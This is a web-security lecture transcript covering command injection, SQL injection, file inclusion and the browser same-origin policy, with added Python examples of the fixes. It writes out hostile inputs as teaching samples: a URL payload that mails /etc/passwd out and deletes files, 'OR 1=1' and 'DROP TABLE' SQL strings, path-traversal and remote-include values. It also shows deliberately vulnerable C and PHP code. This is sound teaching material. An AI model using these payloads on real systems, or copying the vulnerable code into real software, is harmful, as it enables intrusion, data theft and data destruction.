Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson)
Web Server Threats
• What can happen?
 – Compromise
 – Defacement
 – Gateway to attacking clients
 – Disclosure
 – (not mutually exclusive)
• And what makes the problem particularly tricky?
 – Public access
 – Mission creep
Attacking Via HTTP
• URLs: Global identifiers of network-retrievable resources
 http://user:[email protected]:81/class?name=cs161#homework
 Components, left to right: Protocol, Username, Password, Host, Port, Path, Query, Fragment
Simple Service Example
• Allow users to search the local phonebook for any entries that match a regular expression
• Invoked via URL like: http://harmless.com/phonebook.cgi?regex=<pattern>
• So for example: http://harmless.com/phonebook.cgi?regex=daw|vern searches the phonebook for any entries with “daw” or “vern” in them
• (Note: web surfer doesn’t enter this URL themselves; an HTML form constructs it from what they type)
Simple Service Example, con’t
• Assume our server has some “glue” that parses URLs to extract parameters into C variables
 – and returns stdout to the user
• Simple version of code to implement search:

```c
#include <stdio.h>
#include <stdlib.h>

/* print any employees whose name
 * matches the given regex */
void find_employee(char *regex)
{
    char cmd[512];
    /* unbounded copy: a long regex overruns cmd (the slide's first problem) */
    sprintf(cmd, "grep %s phonebook.txt", regex);
    system(cmd);
}
```
Simple Service Example, con’t
• Assume our server has some “glue” that parses URLs to extract parameters into C variables
 – and returns stdout to the user
• Simple version of code to implement search:

```c
#include <stdio.h>
#include <stdlib.h>

/* print any employees whose name
 * matches the given regex */
void find_employee(char *regex)
{
    char cmd[512];
    /* bounded now, so no overflow; the string still goes to a shell */
    snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex);
    system(cmd);
}
```

Are we done?
A Digression into Breakfast Cereals
• 2600 Hz tone a form of inband signaling
• Beware allowing control information to come from data
• (also illustrates security-by-obscurity)
Instead of http://harmless.com/phonebook.cgi?regex=daw|vern
How about http://harmless.com/phonebook.cgi?regex=foo;%20mail%20-s%[email protected]%20</etc/passwd;%20rm

```c
#include <stdio.h>
#include <stdlib.h>

/* print any employees whose name
 * matches the given regex */
void find_employee(char *regex)
{
    char cmd[512];
    /* regex is pasted verbatim into a shell command line */
    snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex);
    system(cmd);
}
```

Problems?
How To Fix Command Injection?
• Quote the argument:
 snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);
 …regex=foo'; mail -s [email protected] </etc/passwd; rm'
• Okay, then scan regex and strip ' - does that work?
 regex=O'Malley
• Okay, then scan regex and escape ' …. ?
 regex ⇒ O\'Malley (not actually quite right, but ignore that)
 …regex=foo\'; mail … ⇒ …regex=foo\\'; mail …
 (argument to grep is “foo\”)
• Okay, then scan regex and escape ' and \ …. ?
 …regex=foo\'; mail … ⇒ …regex=foo\\\'; mail …
 (argument to grep is “foo\'; mail …”)
Input Sanitization
• In principle, can prevent injection attacks by properly sanitizing input
 – Remove inputs with meta-characters
  • (can have “collateral damage” for benign inputs)
 – Or escape any meta-characters (including escape characters!)
• Requires a complete model of how input subsequently processed
 – E.g. …regex=foo%27; mail …
 – E.g. …regex=foo%25%32%37; mail …
  » Double-escaping bug
• And/or: avoid using a feature-rich API
 – KISS + defensive programming
```c
#include <unistd.h>

/* print any employees whose name
 * matches the given regex */
void find_employee(char *regex)
{
    char *path = "/usr/bin/grep";
    char *argv[10];   /* room for plenty of args */
    char *envp[1];    /* no room since no env. */
    int argc = 0;

    argv[argc++] = path;            /* argv[0] = prog name */
    argv[argc++] = "-e";            /* force regex as pat. (even if it starts with '-') */
    argv[argc++] = regex;           /* one argument, never parsed by a shell */
    argv[argc++] = "phonebook.txt";
    argv[argc++] = 0;
    envp[0] = 0;

    /* execve replaces this process with grep; it only returns on failure */
    if ( execve(path, argv, envp) < 0 )
        command_failed(.....);      /* error handler, elided on the slide */
}
```
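The same idea in Python, added here as an example (not the lecture's own code): the phonebook search built so the user's regex can never become shell syntax, the analogue of the execve() version above, together with helpers that show why the hand-written quoting on the earlier slides is hard to get right and what the double-escaping bug from the Input Sanitization slide looks like. The file name `phonebook.txt` is the slides'; the sample entries and the hostile input string are constructed for this example.

```python
"""Added example: argv-based grep (no shell), correct shell quoting for
comparison, and the double-decoding pitfall. Not code from the slides."""
import os
import shlex
import shutil
import subprocess
import tempfile
from typing import List
from urllib.parse import unquote

PHONEBOOK = "phonebook.txt"   # file name used on the slides


def build_grep_argv(regex: str, phonebook: str = PHONEBOOK) -> List[str]:
    """One list element per argument: no shell parses it, so ';', '|', quotes
    and backslashes in `regex` are just pattern characters. "-e" keeps a regex
    that starts with '-' from being read as an option (same as the C version)."""
    return ["grep", "-e", regex, phonebook]


def find_employee(regex: str, phonebook: str = PHONEBOOK) -> List[str]:
    """Run grep without a shell and return the matching lines (empty if none)."""
    proc = subprocess.run(build_grep_argv(regex, phonebook),
                          capture_output=True, text=True)
    return proc.stdout.splitlines()   # grep exit status 1 just means "no match"


def shell_quoted_command(regex: str) -> str:
    """If a shell is unavoidable, quote with shlex.quote, which handles the
    ' and \\ cases the slide escapes by hand (including the ones it says to ignore)."""
    return "grep -e " + shlex.quote(regex) + " " + PHONEBOOK


def shell_argv(cmd: str) -> List[str]:
    """Split a command line the way a POSIX shell would, to see exactly what
    grep would receive as its arguments."""
    return shlex.split(cmd)


def decode_query_value(value: str, times: int = 1) -> str:
    """Percent-decode `times` times. The web server decodes once; a CGI script
    that decodes again turns the harmless literal %27 into a quote character."""
    for _ in range(times):
        value = unquote(value)
    return value


if __name__ == "__main__":
    hostile = "foo'; mail -s x </etc/passwd; rm'"      # constructed input
    print(build_grep_argv(hostile))                     # one pattern argument
    print(shell_argv(shell_quoted_command("O'Malley"))) # benign quote survives
    print(decode_query_value("foo%25%32%37", times=2))  # foo'
    if shutil.which("grep"):
        with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
            f.write("daw 555-0100\nvern 555-0101\nomalley 555-0102\n")  # constructed
        print(find_employee("vern", f.name))            # ['vern 555-0101']
        os.unlink(f.name)
```

`build_grep_argv` is the fix; `shell_quoted_command` exists only to show that a library quoting routine, not a hand-rolled scan for `'`, is the minimum if a shell really must be involved, and `shell_argv` lets you confirm what grep would actually see.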
Command Injection in the Real World
Structure of Modern Web Services
(diagram) Browser –URL / Form: command.php?arg1=x&arg2=y→ Web server ↔ Database server; the web page is built from the database
PHP: Hypertext Preprocessor
• Server scripting language with C-like syntax
• Can intermingle static HTML and code
 <input value=<?php echo $myvalue; ?>>
• Can embed variables in double-" strings
 $user = "world"; echo "Hello $user!";
 Or
 $user = "world"; echo "Hello" . $user . "!";
• Form data in global arrays $_GET, $_POST, …
SQL
• Widely used database query language
• Fetch a set of records
 SELECT * FROM Person WHERE Username='oski'
• Add data to the table
 INSERT INTO Person (Username, Balance) VALUES ('oski', 10)
• Modify data
 UPDATE Person SET Balance=42 WHERE Username='oski'
• Query syntax (mostly) independent of vendor
SQL Injection Scenario
• Sample PHP

```php
$recipient = $_POST['recipient'];
$sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' ";
$rs = $db->executeQuery($sql);
```

• How can recipient cause trouble here?
 – How can we see anyone’s balance?
SQL Injection Scenario, con’t
 WHERE Balance < 100 AND Username='$recipient' ";
• recipient = foo' OR 1=1 -- (“--” is a comment, it masks the lack of close ')
• Or foo'; DROP TABLE Person; -- ?
• Or … change database however you wish
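The scenario above rebuilt on sqlite3, as an added example (not the lecture's own code), so the effect of the recipient value can be observed next to the parameterized form that prevents it. The table and its three rows are constructed for this example; the query text and the `foo' OR 1=1 --` value are the slides'.

```python
"""Added example: the slide's PHP query as string concatenation versus
parameter binding, on an in-memory sqlite3 database with constructed rows."""
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the slides)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Person (PersonID INTEGER PRIMARY KEY, "
               "Username TEXT, Balance INTEGER)")
    db.executemany("INSERT INTO Person (Username, Balance) VALUES (?, ?)",
                   [("oski", 10), ("alice", 500), ("bob", 75)])
    return db


def lookup_vulnerable(db: sqlite3.Connection, recipient: str) -> List[int]:
    """String concatenation, as in the slide's PHP: whatever is in `recipient`
    is parsed as SQL. With foo' OR 1=1 -- the WHERE clause becomes
    (Balance < 100 AND Username='foo') OR 1=1, i.e. every row, and the
    trailing quote is swallowed by the -- comment."""
    sql = ("SELECT PersonID FROM Person WHERE Balance < 100 "
           "AND Username='" + recipient + "' ORDER BY PersonID")
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db: sqlite3.Connection, recipient: str) -> List[int]:
    """Placeholder binding: `recipient` is sent as a string value, never
    spliced into the statement text, so quotes and -- have no SQL meaning."""
    sql = ("SELECT PersonID FROM Person WHERE Balance < 100 "
           "AND Username=? ORDER BY PersonID")
    return [row[0] for row in db.execute(sql, (recipient,))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "oski"))            # [1]
    print(lookup_vulnerable(db, "foo' OR 1=1 --"))  # [1, 2, 3]: alice's 500 included
    print(lookup_parameterized(db, "foo' OR 1=1 --"))  # []
    # The slide's second payload stacks a DROP TABLE after a ';'. sqlite3's
    # execute() refuses more than one statement per call, but many database
    # drivers do not, so binding is the defence to rely on, not the driver.
```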
SQL Injection: Retrieving Data
(diagram) 1. Attacker posts malicious form to Victim Server → 2. Victim Server sends unintended query to Victim SQL DB → 3. Attacker receives valuable data
SQL Injection: Modifying Data
(diagram) 1. Attacker posts malicious form to Victim Server → 2. Victim Server sends unintended command to Victim SQL DB → 3. Database modified
Defenses (work-in-progress)
• Character-level taint tracking: Check that keywords, metachars are untainted.
 SELECT u FROM t WHERE n='Bobby'
 SELECT u FROM t WHERE n='Bobby' OR 1=1 --'
• Secure template languages: Template languages should automatically quote or encode substitutions appropriately.
 <P>Hello ${username}! Welcome back.
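What the "secure template languages" bullet asks for, as an added example (not the lecture's or any template engine's own code): a minimal renderer in which every `${name}` substitution is HTML-encoded by default, beside plain substitution for contrast. The template text is the slide's; `string.Template` and `html.escape` are standard library.

```python
"""Added example: a string.Template subclass that HTML-escapes every
substituted value, so markup in user data is shown, not interpreted."""
import html
from string import Template

SLIDE_TEMPLATE = "<P>Hello ${username}! Welcome back."   # from the slide


class EscapingTemplate(Template):
    """Same ${name} syntax as string.Template; values are encoded for an
    HTML text context on the way in. Substitution of raw markup needs an
    explicit, separate API, which this class deliberately does not offer."""

    def render(self, **values: object) -> str:
        safe = {k: html.escape(str(v), quote=True) for k, v in values.items()}
        return self.substitute(safe)   # KeyError if a placeholder is missing


def render_greeting(username: str) -> str:
    """Render the slide's template with encoding applied."""
    return EscapingTemplate(SLIDE_TEMPLATE).render(username=username)


def render_unsafe(username: str) -> str:
    """Plain substitution for contrast: markup in the value lands in the page
    as markup, which is the class of bug the slide wants the engine to prevent."""
    return Template(SLIDE_TEMPLATE).substitute(username=username)


if __name__ == "__main__":
    print(render_greeting("Bobby"))
    print(render_greeting("<b>Bobby</b>"))   # &lt;b&gt;Bobby&lt;/b&gt; in the output
    print(render_unsafe("<b>Bobby</b>"))     # raw <b> tag in the output
```

The encoding is chosen for an HTML text context; a substitution inside an attribute, a URL, or a script block needs a different encoder, which is why real template engines track the context of each placeholder.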
Injection via file inclusion
1. Form displayed in user’s browser
2. PHP code executed by server
3. Now suppose COLOR=http://badguy/evil
 Or: COLOR=../../../etc/passwd%00
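Server-side handling of a parameter like COLOR before it reaches an include, as an added example (not the lecture's own code): both COLOR values shown on the slide are rejected. The template directory, the `.php` suffix and the allowed names are assumptions made for this example.

```python
"""Added example: two ways to keep a file-inclusion parameter from selecting
a remote URL or a file outside the intended directory."""
import os
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

TEMPLATE_DIR = Path("/var/www/themes")      # assumed location
ALLOWED_COLORS = {"red", "green", "blue"}   # assumed allowlist


def resolve_include_allowlist(color: str) -> Optional[Path]:
    """Strongest form: only names from a fixed set are ever turned into paths,
    so no decoding or path arithmetic happens on user input at all."""
    if color in ALLOWED_COLORS:
        return TEMPLATE_DIR / (color + ".php")
    return None


def resolve_include_confined(color: str, base: Path = TEMPLATE_DIR) -> Optional[Path]:
    """More general form when the set of files is open-ended: decode exactly
    once, reject NUL bytes and URL schemes, then require the lexically
    normalised path to stay inside `base`."""
    value = unquote(color)
    if "\x00" in value:            # %00 would truncate the name in a C-level open()
        return None
    if "://" in value or value.startswith("//"):   # remote inclusion
        return None
    candidate = base / (value + ".php")
    normalised = Path(os.path.normpath(str(candidate)))   # collapses ../ segments
    if base not in normalised.parents:                    # escaped the directory
        return None
    return normalised


if __name__ == "__main__":
    for value in ("blue", "http://badguy/evil", "../../../etc/passwd%00",
                  "../../../etc/passwd"):
        print(repr(value), "->", resolve_include_allowlist(value),
              "|", resolve_include_confined(value))
```

`os.path.normpath` is purely lexical, which is what makes the example runnable without the directory existing; on a live system, a final `Path.resolve()` check is also needed so that a symbolic link inside the directory cannot point back out of it.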
Coming Up …
• Friday’s lecture: Buffer Overflow attacks
 – Read P&P 3.0, 3.1, 3.2
• Follow the newsgroup
• If you are also enrolled in CS160 or CS164 and need to take the final at the alternate time, sign up via the web
• Due Thu Jan 28 (11:59PM):
 – Get your class account set up
 – Use it to submit a writeup that you have read the class web page, including (especially) policies on collaboration, Academic Dishonesty, and ethics/legality
Safe to type your password?
???
Same-Origin Policy
How does the browser isolate different sites?
Windows Interact
Are all interactions good?
Browser Same-Origin Policy
• Different origins have limited interaction
• Origin is the tuple <domain, port, protocol>
 http://www.example.com:80/whoami and http://www.example.com:80/hello: Full access
 https://www.example.com:443/hello and http://www.example.com:443/hello: Limited access
Same-Origin Policy Examples
• Example HTML at http://www.site.com/
 <iframe src="http://othersite.com/"></iframe>
 <img src="http://othersite.com/logo.gif">
• Disallowed:
 alert(frames[0].document.body.innerHTML)
 alert(frames[0].location)
• Allowed:
 alert(images[0].height)
 frames[0].location = "http://othersite.com/foo";
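The URL anatomy from the Attacking Via HTTP slide and the origin tuple from the Browser Same-Origin Policy slide, as one added example (not the lecture's own code): split a URL into its named components, reduce it to (protocol, host, port), and compare. The example URLs are the slides'; the URL with `user:pw@example.com` and the default-port table are constructed for this example.

```python
"""Added example: URL components and the origin tuple the browser compares.
Path, query and fragment are deliberately not part of the origin."""
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}   # standard scheme defaults


def url_parts(url: str) -> Dict[str, Optional[object]]:
    """The eight pieces labelled on the slide, as urlsplit reads them."""
    p = urlsplit(url)
    return {"protocol": p.scheme, "username": p.username, "password": p.password,
            "host": p.hostname, "port": p.port, "path": p.path,
            "query": p.query, "fragment": p.fragment}


def origin(url: str) -> Tuple[str, str, Optional[int]]:
    """(protocol, host, port); an omitted port takes the scheme's default so
    http://a/ and http://a:80/ compare equal, as they do in the browser."""
    p = urlsplit(url)
    port = p.port if p.port is not None else DEFAULT_PORTS.get(p.scheme.lower())
    return (p.scheme.lower(), (p.hostname or "").lower(), port)


def same_origin(a: str, b: str) -> bool:
    """True exactly when the browser would grant full access between a and b."""
    return origin(a) == origin(b)


if __name__ == "__main__":
    print(url_parts("http://user:pw@example.com:81/class?name=cs161#homework"))
    print(same_origin("http://www.example.com:80/whoami",
                      "http://www.example.com:80/hello"))     # True: full access
    print(same_origin("https://www.example.com:443/hello",
                      "http://www.example.com:443/hello"))    # False: limited access
```

The second pair differs only in protocol, yet it is a different origin; that is the point of including protocol in the tuple, since otherwise a page fetched over plain http could read one fetched over https from the same host.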
Mixed Content
A Guninski Attack
(diagram) login window named awglogin
window.open("https://attacker.com/", "awglogin");
What should the policy be?
• Child
• Sibling
• Descendant
• Frame Bust
Building up Web Pages from SQL

```php
<?php
$result = mysql_query("SELECT * from users where username=" . $_POST['username'] .
                      " AND password=" . $_POST['password']);
$row = mysql_fetch_array($result)
....
?>
<html><body>
Welcome <?php print $row['username'] ?>
</body></html>
```